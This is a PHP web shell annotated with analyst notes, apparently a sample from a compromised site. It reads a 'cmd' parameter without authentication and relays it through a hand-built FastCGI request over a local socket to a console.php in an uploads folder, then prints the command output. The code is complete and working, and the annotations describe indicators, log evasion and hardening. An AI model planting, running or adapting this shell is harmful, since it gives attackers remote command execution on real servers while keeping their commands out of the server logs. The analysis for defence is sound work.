<?php
// Fixed: Forces proper environment for proc_open in console.php
/**
 * Relays a command string to a second PHP script (console.php) by writing a
 * hand-built FastCGI request to a local unix socket, then returns the text that
 * script rendered inside its <pre class='stdout'> element.
 *
 * Analyst notes:
 * - The socket path and the target script path are hard-coded, so both are
 *   host-specific indicators for this sample.
 * - The target script sits under an uploads directory; a PHP file being run from
 *   there means PHP execution is permitted on the upload path.
 * - The request is written straight to the socket rather than sent over HTTP, so
 *   web server access logs would presumably show requests to this file only and
 *   not to console.php — TODO confirm against the host's logging.
 * - Presumably the pool behind the socket is configured differently from the
 *   one serving this file (the header comment mentions proc_open) — verify the
 *   pool configuration during triage.
 * - Hardening that applies here: deny PHP execution under upload directories and
 *   restrict which accounts may connect to the socket.
 *
 * @param $cmd Command text; the caller in this file takes it from the request unvalidated.
 * @return string Tag-stripped contents of the first <pre class='stdout'> match, or a
 *                diagnostic string holding the first 500 bytes of the raw response.
 */
function exec_cmd_via_console($cmd) {
// Hard-coded socket and target script (record both as indicators).
$socketPath = '/tmp/php-cgi-73.sock';
$scriptFile = '/www/wwwroot/hljrlsj.com/public/uploads/file/20260310/console.php';
// Local unix-socket connection with a 5 second connect timeout.
$socket = stream_socket_client("unix://$socketPath", $errno, $errstr, 5);
// BEGIN_REQUEST
fwrite($socket, pack('CCnnCa*', 1, 1, 1, 8, 0, pack('NN', 0, 1)));
// CRITICAL: Add these env vars that proc_open needs
// These name/value pairs make the internal request look like an ordinary GET
// for console.php; the command travels URL-encoded in REQUEST_URI and QUERY_STRING.
$params = [
'SCRIPT_FILENAME' => $scriptFile,
'REQUEST_URI' => '/console.php?cmd=' . urlencode($cmd),
'QUERY_STRING' => 'cmd=' . urlencode($cmd),
'REQUEST_METHOD' => 'GET',
'SERVER_PROTOCOL' => 'HTTP/1.1',
'HTTP_HOST' => 'hljrlsj.com',
'HTTP_USER_AGENT' => 'Mozilla/5.0',
// proc_open needs TERM for non-interactive
'TERM' => 'xterm',
'SHELL' => '/bin/bash',
'PATH' => '/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin'
];
// Each pair is written as its own record: a length prefix for the name and for
// the value (one byte when under 128, otherwise "\x80" followed by pack('N', length)),
// then the name and value, zero-padded to a multiple of 8 bytes.
foreach ($params as $k => $v) {
$kl = strlen($k); $vl = strlen($v);
$klen = $kl < 128 ? chr($kl) : "\x80".pack('N',$kl);
$vlen = $vl < 128 ? chr($vl) : "\x80".pack('N',$vl);
$data = $klen.$vlen.$k.$v;
$pad = (8-strlen($data)%8)%8;
fwrite($socket, pack('CCnnC',1,4,1,strlen($data),$pad).$data.str_repeat("\0",$pad));
}
// End records
fwrite($socket, pack('CCnnC',1,4,1,0,0)); // PARAMS END
fwrite($socket, pack('CCnnC',1,5,1,0,0)); // STDIN END
// Read full HTML response
// The raw bytes from the socket are concatenated as-is in 8192-byte reads until
// EOF; nothing here parses the response framing.
$response = '';
while (!feof($socket)) $response .= fread($socket, 8192);
fclose($socket);
// Extract just command output from HTML
// Non-greedy match with the /s flag, so the first <pre class='stdout'> element
// is captured even when it spans several lines; markup inside it is stripped.
if (preg_match('/<pre class=\'stdout\'>(.*?)<\/pre>/s', $response, $match)) {
return strip_tags($match[1]);
}
// Fallback: the first 500 bytes of the raw response are returned for inspection.
return "No output - check HTML: " . substr($response, 0, 500);
}
// Web shell
// Request entry point. The command is read from the `cmd` GET parameter, then
// from the POST field of the same name, and defaults to 'id' when neither is
// set. No authentication or input validation appears in the visible lines.
// For log review: a GET-supplied command lands in the access-log query string,
// while POST bodies typically are not logged, so check both request methods.
$cmd = $_GET['cmd'] ?? $_POST['cmd'] ?? 'id';
// The heading text and the EXEC form are fixed strings, usable as content-scan
// markers when hunting for copies of this file.
echo "<h2>🔥 FastCGI Shell via console.php</h2>";
// $cmd is interpolated into the form's value attribute without HTML escaping.
echo "<form method=GET><input name=cmd value='$cmd' style='width:70%'><input type=submit value=EXEC></form>";
// The relayed result is printed inside <pre> exactly as returned by the function.
echo "<pre>" . exec_cmd_via_console($cmd) . "</pre>";
?>